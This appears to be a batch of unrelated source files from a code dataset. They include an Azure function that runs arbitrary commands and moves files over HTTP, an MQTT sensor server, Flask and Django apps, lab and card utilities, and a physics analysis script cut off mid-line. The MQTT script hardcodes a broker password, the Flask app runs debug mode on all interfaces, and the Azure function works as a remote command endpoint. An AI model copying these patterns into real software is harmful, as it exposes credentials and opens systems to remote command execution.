GETFILE_ACTION in body:\n return GETFILE_ACTION, body[GETFILE_ACTION]\n else:\n raise Exception(\"[!] parse_action: getfile request does not include data\")\n elif body[ACTION] == PUTFILE_ACTION:\n if PUTFILE_ACTION in body:\n return PUTFILE_ACTION, body[PUTFILE_ACTION]\n else:\n raise Exception(\"[!] parse_action: putfile request does not include data\")\n else:\n raise Exception(\"[!] parse_action: Unknown action: {}\".format(body[\"action\"]))\n\n else:\n raise Exception(\"[!] parse_action: Request does not include an action\")\n\n\ndef run_cmd(cmd):\n \"\"\"\n * Runs a command as an external process\n \"\"\"\n os.environ['PYTHONUNBUFFERED'] = \"1\" # Required for streaming both stdout and stderr to stdout\n child = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n out, _ = child.communicate()\n rc = child.returncode\n return rc, out\n\n\n# returns LEXResult, output\ndef run_getfile(file, mode):\n # Check that file exists\n if not os.path.exists(file):\n return LEXResult.ERR, \"run_getfile: file '{}' doesn't exist on Lambda\".format(file)\n\n try:\n content = readfile(file, mode)\n\n # Base64 encode\n if type(content) is str:\n content = bytes(content.encode(\"utf8\")) # b64encode only excepts bytes.\n encoded = base64.b64encode(content)\n\n if len(encoded) < MAX_BODY_SIZE:\n return LEXResult.OK, encoded\n\n # file too big, let's try to compress it\n content_len = len(content)\n encoded_len = len(encoded)\n del content, encoded # delete large vars\n\n # Create tar file\n tar_path = \"/tmp/\" + os.path.basename(file) + \".tar\"\n create_tar_file(file, tar_path)\n\n # Read tar file and then delete it\n tar_content = readfile(tar_path, READ_BINARY)\n os.unlink(tar_path)\n\n # Send tar content if not too big\n tar_encoded = base64.b64encode(tar_content)\n if len(tar_encoded) < MAX_BODY_SIZE:\n return LEXResult.OK_TAR, tar_encoded\n\n except UnicodeDecodeError:\n err_str = \"run_getfile: reading file failed with UnicodeDecodeError, consider reading in binary mode (!gtb)\"\n return LEXResult.ERR, err_str\n except IOError as e:\n return LEXResult.ERR, repr(e)\n\n # File too big....\n err_str = \"[!] File to big! size {}, encoded size {}, tar size {}, encoded tar size {}\".format( \\\n content_len, encoded_len, len(tar_content), len(tar_encoded))\n return LEXResult.ERR, err_str\n\n\n# returns LEXResult, output\ndef run_putfile(path, content, writemode):\n decoded = base64.b64decode(str(content))\n\n # If not binary write, convert decoded into a string\n if writemode == WRITE:\n decoded = decoded.decode(\"utf8\")\n\n try:\n # Write the received file\n writefile(path, writemode, decoded)\n except IOError as e:\n return LEXResult.ERR, \"Failed to write to {} with: {}\".format(path, repr(e))\n\n return LEXResult.OK, None\n\n\ndef construct_cmd_response(return_code, output):\n if return_code == 0:\n result = LEXResult.OK\n else:\n result = LEXResult.ERR\n\n output_b64 = base64.b64encode(output).decode(\"ascii\")\n return construct_response(result, output_b64) \n\n\ndef construct_getfile_response(result, output):\n if result != LEXResult.ERR:\n # if an err didn't occur, the output is base64 bytes. Let's convert into base64 string\n output = output.decode(\"ascii\")\n\n return construct_response(result, output)\n\n\ndef construct_putfile_response(result, output):\n return construct_response(result, output)\n\n\ndef construct_exception_response(exception):\n if INCLUDE_TRACEBACK_IN_RESPONSE:\n # Prefix exception with traceback info\n display_exception = \"LEX Traceback:\\n\"\n for trace in format_tb(exception.__traceback__):\n display_exception += trace\n\n else:\n display_exception = \"(set Lambda's env var 'LEX_TRACE' as 'True' for traceback info)\\n\"\n\n display_exception += str(repr(exception))\n\n return construct_response(LEXResult.LEX_EXCEPTION, display_exception)\n\n\ndef construct_response(result, output):\n response = json.dumps({\"result\": result.value, \"output\": output})\n return func.HttpResponse(response)\n","sub_path":"deploy/azure/python3/lex_func/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483548135","text":"from enum import Enum\n\nEventType = Enum(\"EventType\", \"BAR ORDER FILL SIGNAL\")\n\n\nclass Event:\n pass\n\n\nclass Bar(Event):\n def __init__(\n self,\n ticker,\n time,\n period,\n open_price,\n high_price,\n low_price,\n close_price,\n volume,\n adj_close=None,\n ):\n self.type = EventType.BAR\n self.ticker = ticker\n self.time = time\n self.period = period\n self.open_price = open_price\n self.close_price = close_price\n self.high_price = high_price\n self.low_price = low_price\n self.volume = volume\n self.adj_close = adj_close\n\n def __str__(self):\n return f\"\"\n\n\nclass Order(Event):\n def __init__(self, ticker, target_weight=None, quantity=None):\n self.type = EventType.ORDER\n self.ticker = ticker\n self.target_weight = target_weight\n self.quantity = quantity\n\n\nclass Fill(Event):\n def __init__(self, timestamp, ticker, quantity, fill_price, commission):\n self.type = EventType.FILL\n self.timestamp = timestamp\n self.ticker = ticker\n self.quantity = quantity\n self.fill_price = fill_price\n self.commission = commission\n","sub_path":"backtester/backtester/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"262732449","text":"import paho.mqtt.client as mqtt\nimport os\nfrom urllib.parse import urlparse\nimport secrets\nimport django\ndjango.setup()\nfrom django.contrib.auth.models import User\nfrom aifarmer.models import Sensor, SensorsUsers, Temperature, Humidity\n\n\n\nstop_dev=False\ndef on_connect(client, userdata, flags, rc):\n print(\"rc: \" + str(rc))\n\ndef on_message(client, obj, msg):\n print(msg.topic + \" \" + str(msg.qos) + \" \" + str(msg.payload))\n\n mess = msg.payload.decode()\n top = msg.topic\n if len(top)>63:\n tok_loc=top[0:top.index('/')]\n if top.endswith('T'):\n sens = Sensor.objects.get(token_sensor=tok_loc.strip())\n t = Temperature(sensor_temperature=sens, temperature_read=float(mess))\n t.save()\n elif top.endswith('H'):\n sens = Sensor.objects.get(token_sensor=tok_loc.strip())\n h = Humidity(sensor_humidity=sens, humidity_read=float(mess))\n h.save()\n\n\ndef on_publish(client, obj, mid):\n #print(\"mid: \" + str(mid))\n a=1\n\ndef existence_callback(client,obj,message):\n mess = message.payload.decode()\n dev_name = mess[0:mess.index('/')]\n print('device-name:'+ dev_name)\n dev_pin = mess[mess.index('/')+1: len(mess)]\n print('device-pin:' + dev_pin)\n\n if Sensor.objects.filter(name_sensor=dev_name).count() == 0:\n client.subscribe(dev_name+'/REG',0) # to be splitted in dev-name and pin\n client.message_callback_add(dev_name+'/REG',registration_callback)\n tok = secrets.token_hex(32)\n sensor = Sensor(name_sensor=dev_name,pin_sensor=dev_pin,token_sensor=tok,latitude_sensor=45,longitude_sensor=45)\n sensor.save()\n\n\n # send dev_name, dev_pin, GENERATE token and write DB.\n # <==> it doesn't already exist!!!\n\n\ndef registration_callback(client,obj,message):\n mess = message.payload.decode()\n print('?? HERE ??')\n top = str(message.topic)\n if mess == '?':\n dev_name = top[0:top.index('/')]\n print(dev_name)\n Sens=Sensor.objects.filter(name_sensor=dev_name)\n tok_loc = str(Sens.token_sensor)\n for sen in Sens:\n client.publish(str(message.topic),tok_loc)\n client.subscribe(tok_loc+'/T')\n client.subscribe(tok_loc+'/H')\n\n\n\ndef on_subscribe(client, obj, mid, granted_qos):\n print(\"Subscribed: \" + str(mid) + \" \" + str(granted_qos))\n\ndef on_log(client, obj, level, string):\n print(string)\n\n\nmqttc = mqtt.Client()\n# Assign event callbacks\nmqttc.on_message = on_message\nmqttc.on_connect = on_connect\nmqttc.on_publish = on_publish\nmqttc.on_subscribe = on_subscribe\n\n# Uncomment to enable debug messages\n#mqttc.on_log = on_log\n\n# Parse CLOUDMQTT_URL (or fallback to localhost)\n#url_str = 'mqtt://try:try@broker.shiftr.io:1883'\nurl_str = 'mqtt://astroteo:Gold4Himself@mqtt.aifarmer.du.cdr.mn:8883'\nurl = urlparse(url_str)\nprint(url.hostname)\nprint(url.username)\nprint(url.password)\nprint(url.port)\n\n\nsub_topics= [('NEW-DEV',0)]\n#pub_topics = ['DEV-42/ACT','DEV-43/ACT']\n#pub_contents = ['0','1']\n\n\n# Connect\nmqttc.username_pw_set(url.username, url.password)\nmqttc.connect(url.hostname, url.port)\n\n# Start subscribe, with QoS level 0\nmqttc.subscribe(sub_topics)\nmqttc.message_callback_add('NEW-DEV',existence_callback)\n# Continue the network loop, exit when an error occurs\nrc = 0\ncount=0\nwhile rc == 0:\n rc = mqttc.loop()\n","sub_path":"PythonForCheck/sim_srv.py","file_name":"sim_srv.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52827","text":"# coding:utf-8\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom werkzeug.utils import secure_filename\nimport os\nfrom flask_socketio import SocketIO, emit\nprint(os.system('ifconfig | grep -w inet'))\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app)\n\n\n@app.route('/IM', methods=['POST', 'GET'])\ndef IM():\n return render_template('publicIM.html')\n\n\n@app.route('/upload', methods=['POST', 'GET'])\ndef upload():\n if request.method == 'POST':\n print(request.files)\n f = request.files['file']\n print(f)\n # 获取当前py文件目录\n basepath = os.path.dirname(__file__)\n uploadpath = os.path.join(basepath, 'static/uploadfile', secure_filename(f.filename))\n f.save(uploadpath)\n return render_template('upload.html')\n\n\n@socketio.on('imessage', namespace='/test_conn')\ndef message_info(message):\n print(message)\n emit('message', {'data': message['data']}, broadcast=True)\n\n\n@app.route('/')\ndef index():\n return redirect(url_for('IM'))\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000, debug=True)\n socketio.run(app=app, host=\"0.0.0.0\", port=5000, debug=True)","sub_path":"NiceFlask/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283431849","text":"from django.core.urlresolvers import reverse\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.views.generic import FormView\nfrom django.views.generic import View\nfrom braces.views import LoginRequiredMixin, MultiplePermissionsRequiredMixin, PermissionRequiredMixin\nfrom questionnaire.forms.questionnaires import QuestionnaireFilterForm, PublishQuestionnaireForm\n\nfrom questionnaire.forms.sections import SectionForm, SubSectionForm\nfrom questionnaire.mixins import AdvancedMultiplePermissionsRequiredMixin\nfrom questionnaire.services.questionnaire_cloner import QuestionnaireClonerService\nfrom questionnaire.services.questionnaire_finalizer import QuestionnaireFinalizeService\nfrom questionnaire.services.questionnaire_entry_form_service import QuestionnaireEntryFormService\nfrom questionnaire.models import Questionnaire, Section, QuestionGroup, Answer, AnswerGroup\nfrom questionnaire.forms.answers import NumericalAnswerForm, TextAnswerForm, DateAnswerForm, MultiChoiceAnswerForm\nfrom questionnaire.services.users import UserQuestionnaireService\n\n\nANSWER_FORM = {'Number': NumericalAnswerForm,\n 'Text': TextAnswerForm,\n 'Date': DateAnswerForm,\n 'MultiChoice': MultiChoiceAnswerForm,\n }\n\n\nclass Entry(AdvancedMultiplePermissionsRequiredMixin, FormView):\n template_name = 'questionnaires/entry/index.html'\n GET_permissions = {'any': ('auth.can_submit_responses', 'auth.can_view_users', 'auth.can_edit_questionnaire')}\n POST_permissions = {'any': ('auth.can_submit_responses', )}\n\n def get(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n section = Section.objects.get(id=self.kwargs['section_id'])\n user_questionnaire_service = UserQuestionnaireService(self.request.user.user_profile.country, questionnaire)\n initial = {'status': 'Draft', 'country': self.request.user.user_profile.country,\n 'version': user_questionnaire_service.GET_version, 'questionnaire': questionnaire}\n required_answers = 'show' in request.GET\n formsets = QuestionnaireEntryFormService(section, initial=initial, highlight=required_answers,\n edit_after_submit=user_questionnaire_service.edit_after_submit)\n\n printable = 'printable' in request.GET\n preview = user_questionnaire_service.preview() or 'preview' in request.GET\n\n context = {'questionnaire': questionnaire,\n 'section': section, 'printable': printable,\n 'preview': preview, 'formsets': formsets,\n 'ordered_sections': questionnaire.sections.order_by('order'),\n 'form': SectionForm(initial={'questionnaire': questionnaire}),\n 'action': reverse('new_section_page', args=(questionnaire.id, )),\n 'subsection_form': SubSectionForm(),\n 'subsection_action': reverse('new_subsection_page', args=(questionnaire.id, section.id)),\n 'documents': user_questionnaire_service.attachments()}\n\n return self.render_to_response(context)\n\n def post(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n section = Section.objects.get(id=self.kwargs['section_id'])\n user_questionnaire_service = UserQuestionnaireService(self.request.user.user_profile.country, questionnaire)\n initial = {'country': self.request.user.user_profile.country, 'status': 'Draft',\n 'version': user_questionnaire_service.POST_version, 'questionnaire': questionnaire}\n formsets = QuestionnaireEntryFormService(section, initial=initial, data=request.POST,\n edit_after_submit=user_questionnaire_service.edit_after_submit)\n\n context = {'questionnaire': questionnaire, 'section': section,\n 'formsets': formsets, 'ordered_sections': questionnaire.sections.order_by('order'),\n 'form': SectionForm(initial={'questionnaire': questionnaire}),\n 'action': reverse('new_section_page', args=(questionnaire.id, )),\n 'subsection_form': SubSectionForm(),\n 'subsection_action': reverse('new_subsection_page', args=(questionnaire.id, section.id)),\n 'documents': user_questionnaire_service.attachments()}\n\n if formsets.is_valid():\n return self._form_valid(request, formsets, context)\n return self._form_invalid(request, context)\n\n def _form_valid(self, request, formsets, context):\n formsets.save()\n message = 'Draft saved.'\n messages.success(request, message)\n if request.POST.get('redirect_url', None):\n return HttpResponseRedirect(request.POST['redirect_url'].replace('preview=1', ''))\n return self.render_to_response(context)\n\n def _form_invalid(self, request, context):\n message = 'Draft NOT saved. See errors below.'\n messages.error(request, message)\n return self.render_to_response(context)\n\n\nclass SubmitQuestionnaire(AdvancedMultiplePermissionsRequiredMixin, View):\n GET_permissions = {'any': ('auth.can_submit_responses', 'auth.can_view_users', 'auth.can_edit_questionnaire')}\n POST_permissions = {'any': ('auth.can_submit_responses', )}\n\n def post(self, request, *args, **kwargs):\n user_country = self.request.user.user_profile.country\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n user_questionnaire = UserQuestionnaireService(user_country, questionnaire)\n if not user_questionnaire.required_sections_answered():\n return self._reload_section_with_required_answers_errors(request, user_questionnaire, *args, **kwargs)\n return self._submit_answers(request, user_questionnaire, *args, **kwargs)\n\n def _submit_answers(self, request, user_questionnaire_service, *args, **kwargs):\n user_questionnaire_service.submit()\n referer_url = request.META.get('HTTP_REFERER', None)\n redirect_url = referer_url or reverse('home_page')\n redirect_url = self._format_redirect_url(redirect_url)\n messages.success(request, 'Questionnaire Submitted.')\n return HttpResponseRedirect(redirect_url)\n\n def _reload_section_with_required_answers_errors(self, request, user_questionnaire_service, *args, **kwargs):\n section = user_questionnaire_service.unanswered_section\n questionnaire = user_questionnaire_service.questionnaire\n messages.error(request, 'Questionnaire NOT submitted. See errors below.')\n redirect_url = reverse('questionnaire_entry_page', args=(questionnaire.id, section.id))\n return HttpResponseRedirect('%s?show=errors' % redirect_url)\n\n def _format_redirect_url(self, redirect_url):\n redirect_url = redirect_url.replace('?show=errors', '')\n return \"%s?preview=1\" % redirect_url\n\n\nclass DuplicateQuestionnaire(MultiplePermissionsRequiredMixin, View):\n permissions = {'any': ('auth.can_view_users',)}\n\n def post(self, *args, **kwargs):\n form = QuestionnaireFilterForm(self.request.POST)\n if form.is_valid():\n duplicate, _ = QuestionnaireClonerService(form.cleaned_data['questionnaire']).clone()\n duplicate.name = form.cleaned_data['name']\n duplicate.year = form.cleaned_data['year']\n duplicate.save()\n message = \"The questionnaire has been duplicated successfully, You can now go ahead and edit it\"\n messages.success(self.request, message)\n redirect_url = reverse('questionnaire_entry_page', args=(duplicate.id, duplicate.sections.all()[0].id))\n return HttpResponseRedirect(redirect_url)\n message = \"Questionnaire could not be duplicated see errors below\"\n messages.error(self.request, message)\n return HttpResponseRedirect(reverse('manage_jrf_page'))\n\n\nclass FinalizeQuestionnaire(MultiplePermissionsRequiredMixin, View):\n permissions = {'any': ('auth.can_view_users','auth.can_edit_questionnaire')}\n\n def post(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=kwargs['questionnaire_id'])\n message = QuestionnaireFinalizeService(questionnaire).finalize()\n messages.success(self.request, message)\n referer_url = request.META['HTTP_REFERER']\n return HttpResponseRedirect(referer_url)\n\n\nclass UnfinalizeQuestionnaire(MultiplePermissionsRequiredMixin, View):\n permissions = {'any': ('auth.can_view_users', 'auth.can_edit_questionnaire')}\n\n def post(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=kwargs['questionnaire_id'])\n message = QuestionnaireFinalizeService(questionnaire).unfinalize()\n messages.success(self.request, message)\n referer_url = request.META.get('HTTP_REFERER', None) or reverse('manage_jrf_page')\n return HttpResponseRedirect(referer_url)\n\n\nclass PublishQuestionnaire(PermissionRequiredMixin, View):\n permission_required = 'auth.can_view_users'\n\n template_name = 'questionnaires/_publish.html'\n\n def get(self, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n form = PublishQuestionnaireForm(initial={'questionnaire': questionnaire})\n context = {'questionnaire': questionnaire,\n 'publish_form': form, 'btn_label': \"Publish\",\n 'cancel_url': reverse('manage_jrf_page')}\n return render(self.request, self.template_name, context)\n\n def post(self, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n form = PublishQuestionnaireForm(initial={'questionnaire': questionnaire}, data=self.request.POST)\n if form.is_valid():\n form.save()\n message = \"The questionnaire has been published to %s\" % \", \".join([region.name for region in form.cleaned_data['regions']])\n messages.success(self.request, message)\n return HttpResponseRedirect(reverse('manage_jrf_page'))\n else:\n message = \"Questionnaire could not be published see errors below\"\n messages.error(self.request, message)\n context = {'questionnaire': questionnaire, 'publish_form': form, 'btn_label': \"Publish\",\n 'cancel_url': reverse('manage_jrf_page')}\n return render(self.request, self.template_name, context)\n\n\nclass ApproveQuestionnaire(MultiplePermissionsRequiredMixin, View):\n permissions = {'any': ('auth.can_view_users',)}\n template_name = 'base/modals/_confirm.html'\n\n def get(self, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=self.kwargs['questionnaire_id'])\n context = {'questionnaire': questionnaire, 'btn_label': \"Approve\",\n 'cancel_url': reverse('manage_jrf_page')}\n return render(self.request, self.template_name, context)\n\n def post(self, request, *args, **kwargs):\n questionnaire = Questionnaire.objects.get(id=kwargs['questionnaire_id'])\n message = QuestionnaireFinalizeService(questionnaire).approve()\n messages.success(self.request, message)\n referer_url = request.META['HTTP_REFERER']\n return HttpResponseRedirect(referer_url)\n\n\nclass DeleteAnswerRow(PermissionRequiredMixin, View):\n permission_required = 'auth.can_submit_responses'\n\n def post(self, request, *args, **kwargs):\n group = QuestionGroup.objects.get(id=kwargs['group_id'])\n primary_answer_id = request.POST.get('primary_answer')\n primary_answer = Answer.objects.filter(id=primary_answer_id).select_subclasses()\n country = self.request.user.user_profile.country\n if self._can_be_deleted(primary_answer, group, country):\n self._delete_answer_row(primary_answer, group)\n return HttpResponse()\n\n def _delete_answer_row(self, primary_answer, group):\n answergroup_filter = primary_answer[0].answergroup.filter(grouped_question=group)\n answergroup_filter[0].answer.all().delete()\n answergroup_filter.delete()\n\n def _can_be_deleted(self, primary_answer, group, country):\n return primary_answer and group.grid and country == primary_answer[0].country","sub_path":"questionnaire/views/questionnaires.py","file_name":"questionnaires.py","file_ext":"py","file_size_in_byte":12486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"73558866","text":"import numpy as np\n\n\ndef get_well_positions(Designs, drug, concentration):\n \"\"\" Function that returns the well in a Design xarray\n given the drug name and concentration\n\n Parameters\n ----------\n Design: xarray structure\n\n drug: str\n name of drug being queried\n\n concentration: int\n dose value being queried\n\n Returns\n -------\n wells: list\n list of wells on the plate\n \"\"\"\n try:\n arr = Designs[drug].values\n except KeyError:\n print(\"queried drug not in plate\")\n ind = np.where(arr == concentration)\n wells = []\n if len(ind[0]) > 0:\n for i in range(len(ind[0])):\n pos = '%s%s' % (chr(65+ind[0][i]), ind[1][i]+1)\n wells.append(pos)\n return wells\n\n\ndef get_well_index(well, plate_dims):\n \"\"\"Function that maps well cooridnate to an numerical id\n between 0 and number of wells on the plate\n\n Parameter\n ---------\n well: str\n well coordinate on plate eg: 'B10'\n plate_dims: np array\n dimensions of plate\n\n Returns\n -------\n index: int\n numerical id of the well\n \"\"\"\n\n row_num = ord(well[0]) - 65\n col_num = int(well[1:]) - 1\n index = row_num*plate_dims[1] + col_num\n return index\n\n\ndef get_inner_untreated_wells(Design, drugs):\n \"\"\" function that checks for and returns list of wells\n available in the inner wells\n\n Parameters\n ----------\n Design: xarray structure\n drugs: list\n list of drugs\n\n Returns\n -------\n pos_wells: list\n list of well names\n \"\"\"\n\n untreated_wells = np.ones([16, 24], dtype=bool)\n treatments = drugs + ['DMSO']\n for i, tr in enumerate(treatments):\n nparray = Design[tr].values\n pos = np.nonzero(nparray)\n for l in range(len(pos[0])):\n untreated_wells[pos[0][l], pos[1][l]] = False\n untreated_wells[0, :] = False\n untreated_wells[-1, :] = False\n untreated_wells[:, 0] = False\n untreated_wells[:, -1] = False\n pos = np.nonzero(untreated_wells)\n rows = [chr(65+i) for i in pos[0]]\n cols = [str(j+1) for j in pos[1]]\n pos_wells = [i+j for i, j in zip(rows, cols)]\n return pos_wells\n\n\ndef get_well_name(well_id, plate_dims):\n \"\"\"Function that maps well numerical id to name (label)\n\n Parameter\n ---------\n well_id: int\n well id on plate eg: 234\n plate_dims: np array\n dimensions of plate\n\n Returns\n -------\n index: str\n coordinate label of the well, eg: 'B10'\n \"\"\"\n\n row_num, col_num = divmod(well_id, plate_dims[1])\n row_label = chr(65 + row_num)\n col_label = col_num + 1\n well_name = \"%s%02d\" % (row_label, col_label)\n return well_name\n","sub_path":"datarail/experimental_design/well_mapper.py","file_name":"well_mapper.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549781751","text":"class CardColumn:\n def __init__(self):\n self._head = None\n self._length = 0\n\n def head(self):\n return self._head\n\n def tail(self):\n return self._tail\n\n def length(self):\n return self._length\n\n def is_empty(self):\n if self._length == 0:\n return True\n\n return False\n\n def append(self, card):\n if self._head is None:\n self._head = card\n else:\n card.set_next(self._head)\n self._head = card\n self._length += 1\n\n def append_stack(self, head):\n if self._head is None:\n self._head = head\n else:\n stack = [head]\n cur = head\n length = 1\n while cur.next() is not None:\n cur = cur.next()\n stack.append(cur)\n length += 1\n\n i = len(stack) - 1\n while i >= 0:\n self.append(stack[i])\n i -= 1\n\n def pop(self):\n tmp = self._head\n self._head = self._head.next()\n tmp.set_next(None)\n self._length -= 1\n\n return tmp\n\n def pop_stack(self, length):\n first = self._head\n for _ in range(length-1):\n self._head = self._head.next()\n\n last = self._head\n self._head = self._head.next()\n last.set_next(None)\n self._length -= length\n\n return first\n\n def can_be_stacked_onto_by(self, card):\n if self._head.can_be_stacked_onto_by(card):\n return True\n\n return False\n\n def stack_is_valid(self, length):\n if length <= 0 or length > self._length:\n return False\n cur = self._head\n for _ in range(length-1):\n nxt = cur.next()\n if not nxt.can_be_stacked_onto_by(cur):\n return False\n\n return True\n\n def __getitem__(self, item):\n ret = self._head\n for _ in range(item):\n ret = ret.next()\n\n return ret\n\n def __len__(self):\n return self._length\n","sub_path":"CardColumn.py","file_name":"CardColumn.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"420780195","text":"#!/usr/bin/env python3\n\nimport argparse\nimport math\nimport os\n\nimport hyp_analysis_utils as hau\nimport hyp_plot_utils as hpu\nimport numpy as np\nimport pandas as pd\nimport yaml\nfrom scipy import stats\n\nimport ROOT\nROOT.gROOT.SetBatch()\nnp.random.seed(42)\nROOT.gROOT.LoadMacro('RooCustomPdfs/RooDSCBShape.cxx++')\nfrom ROOT import RooDSCBShape\n\n\n###############################################################################\nparser = argparse.ArgumentParser()\nparser.add_argument('config', help='Path to the YAML configuration file')\nparser.add_argument('-s', '--significance',\n help='Use the BDTefficiency selection from the significance scan', action='store_true')\nparser.add_argument('-syst', '--systematics',\n help='Run systematic uncertanties estimation', action='store_true')\nparser.add_argument('-dbshape', '--dbshape',\n help='Fit using DSCBShape', action='store_true')\nparser.add_argument('-matter', '--matter',\n help='Run with matter', action='store_true')\nparser.add_argument('-antimatter', '--antimatter',\n help='Run with antimatter', action='store_true')\nargs = parser.parse_args()\n\nwith open(os.path.expandvars(args.config), 'r') as stream:\n try:\n params = yaml.full_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n###############################################################################\n\nSPLIT = ''\n\nif args.matter:\n SPLIT = '_matter'\n\nif args.antimatter:\n SPLIT = '_antimatter'\n\n###############################################################################\n\n# define some globals\nFILE_PREFIX = params['FILE_PREFIX'] + SPLIT\n\nDATA_PATH = os.path.expandvars(params['DATA_PATH'])\n\nBKG_MODELS = params['BKG_MODELS'] if 'BKG_MODELS' in params else ['expo']\nCENT_CLASS = params['CENTRALITY_CLASS'][0]\nPT_BINS = params['PT_BINS']\nCT_BINS = params['CT_BINS']\n\nEFF_MIN, EFF_MAX, EFF_STEP = params['BDT_EFFICIENCY']\nEFF_ARRAY = np.around(np.arange(EFF_MIN, EFF_MAX+EFF_STEP, EFF_STEP), 2)\n\nSIGNIFICANCE_SCAN = args.significance\nSYSTEMATICS = args.systematics\nDBSHAPE = args.dbshape\n\nSYSTEMATICS_COUNTS = 100\nFIX_EFF = 0.70 if not SIGNIFICANCE_SCAN else 0\n###############################################################################\n\n###############################################################################\n# input/output files\nresults_dir = os.environ['HYPERML_RESULTS_{}'.format(params['NBODY'])]\ntables_dir = os.path.dirname(DATA_PATH)\nefficiency_dir = os.environ['HYPERML_EFFICIENCIES_{}'.format(params['NBODY'])]\n\n# significance scan output\nfile_name = results_dir + f'/Efficiencies/{FILE_PREFIX}_sigscan.npy'\nsigscan_dict = np.load(file_name, allow_pickle=True).item()\n\n\nsuffix = \"\" if not DBSHAPE else \"_dscb\"\n# output file\nfile_name = results_dir + f'/{FILE_PREFIX}_lifetime{suffix}.root'\noutput_file = ROOT.TFile(file_name, 'recreate')\n###############################################################################\n\nfile_name = results_dir + f'/{FILE_PREFIX}_signal_extraction{suffix}.root'\nprint(file_name)\ninput_file = ROOT.TFile(file_name)\n\n###############################################################################\n\nfile_name = efficiency_dir + f'/{FILE_PREFIX}_preseleff_cent090.root'\n# efficiency_file = ROOT.TFile(file_name, 'read')\n# EFFICIENCY = efficiency_file.Get('PreselEff').ProjectionY()\n# EFFICIENCY.SetDirectory(0)\nefficiency_file = ROOT.TFile('../2body/Macro/eff_ct_090_rew.root', 'read')\nEFFICIENCY = efficiency_file.Get('eff_ct_090_rew')\nEFFICIENCY.SetDirectory(0)\n\nfile_name = results_dir + '/He3_abs_1.5.root'\nabs_file = ROOT.TFile(file_name, 'read')\nABSORPTION = abs_file.Get('0_90/fEffCt_antimatter_cent_0_90_func_BGBW')\nABSORPTION.SetDirectory(0)\n\n\nfile_name = results_dir + '/He3_abs_try.root'\nabs_file = ROOT.TFile(file_name, 'read')\nMATTER_ABSORPTION = abs_file.Get('0_90/matter_antimatter_ratio')\nMATTER_ABSORPTION.SetDirectory(0)\n\n\n###############################################################################\n# define support globals and methods for getting hypertriton counts\nRAW_COUNTS_H2 = {}\nRAW_COUNTS_BEST = {}\n\nCORRECTED_COUNTS_H2 = {}\nCORRECTED_COUNTS_BEST = {}\n\n\n# prepare histograms for the analysis\nfor model in BKG_MODELS:\n RAW_COUNTS_H2[model] = input_file.Get(f'raw_counts_{model}')\n RAW_COUNTS_BEST[model] = RAW_COUNTS_H2[model].ProjectionX(\n f'raw_counts_best_{model}')\n CORRECTED_COUNTS_H2[model] = RAW_COUNTS_H2[model].Clone('corrected_counts')\n CORRECTED_COUNTS_BEST[model] = RAW_COUNTS_BEST[model].Clone(\n 'corrected_counts_best')\n\n\ndef get_presel_eff(ctbin):\n return EFFICIENCY.GetBinContent(EFFICIENCY.FindBin((ctbin[0] + ctbin[1]) / 2))\n\n\ndef get_absorption_correction(ctbin):\n abso = ABSORPTION.GetBinContent(ABSORPTION.FindBin((ctbin[0] + ctbin[1]) / 2))\n matter_abso = abso * \\\n MATTER_ABSORPTION.GetBinContent(\n MATTER_ABSORPTION.FindBin((ctbin[0] + ctbin[1]) / 2))\n if SPLIT == '_antimatter':\n return abso\n if SPLIT == '_matter':\n return matter_abso\n abso = (abso + matter_abso)/2\n return abso\n\n\ndef fill_raw(bkg, ctbin, counts, counts_err, eff):\n bin_idx = RAW_COUNTS_H2[bkg].FindBin(\n (ctbin[0] + ctbin[1]) / 2, round(eff + 0.005, 3))\n RAW_COUNTS_H2[bkg].SetBinContent(bin_idx, counts)\n RAW_COUNTS_H2[bkg].SetBinError(bin_idx, counts_err)\n\n\ndef fill_raw_best(bkg, ctbin, counts, counts_err, eff):\n bin_idx = RAW_COUNTS_BEST[bkg].FindBin((ctbin[0] + ctbin[1]) / 2)\n RAW_COUNTS_BEST[bkg].SetBinContent(bin_idx, counts)\n RAW_COUNTS_BEST[bkg].SetBinError(bin_idx, counts_err)\n\n\ndef fill_corrected(bkg, ctbin, counts, counts_err, eff):\n bin_idx = CORRECTED_COUNTS_H2[bkg].FindBin(\n (ctbin[0] + ctbin[1]) / 2, round(eff + 0.005, 3))\n bin_idx1d = CORRECTED_COUNTS_BEST[bkg].FindBin((ctbin[0] + ctbin[1]) / 2)\n abs_corr = get_absorption_correction(ctbin)\n presel_eff = get_presel_eff(ctbin)\n bin_width = 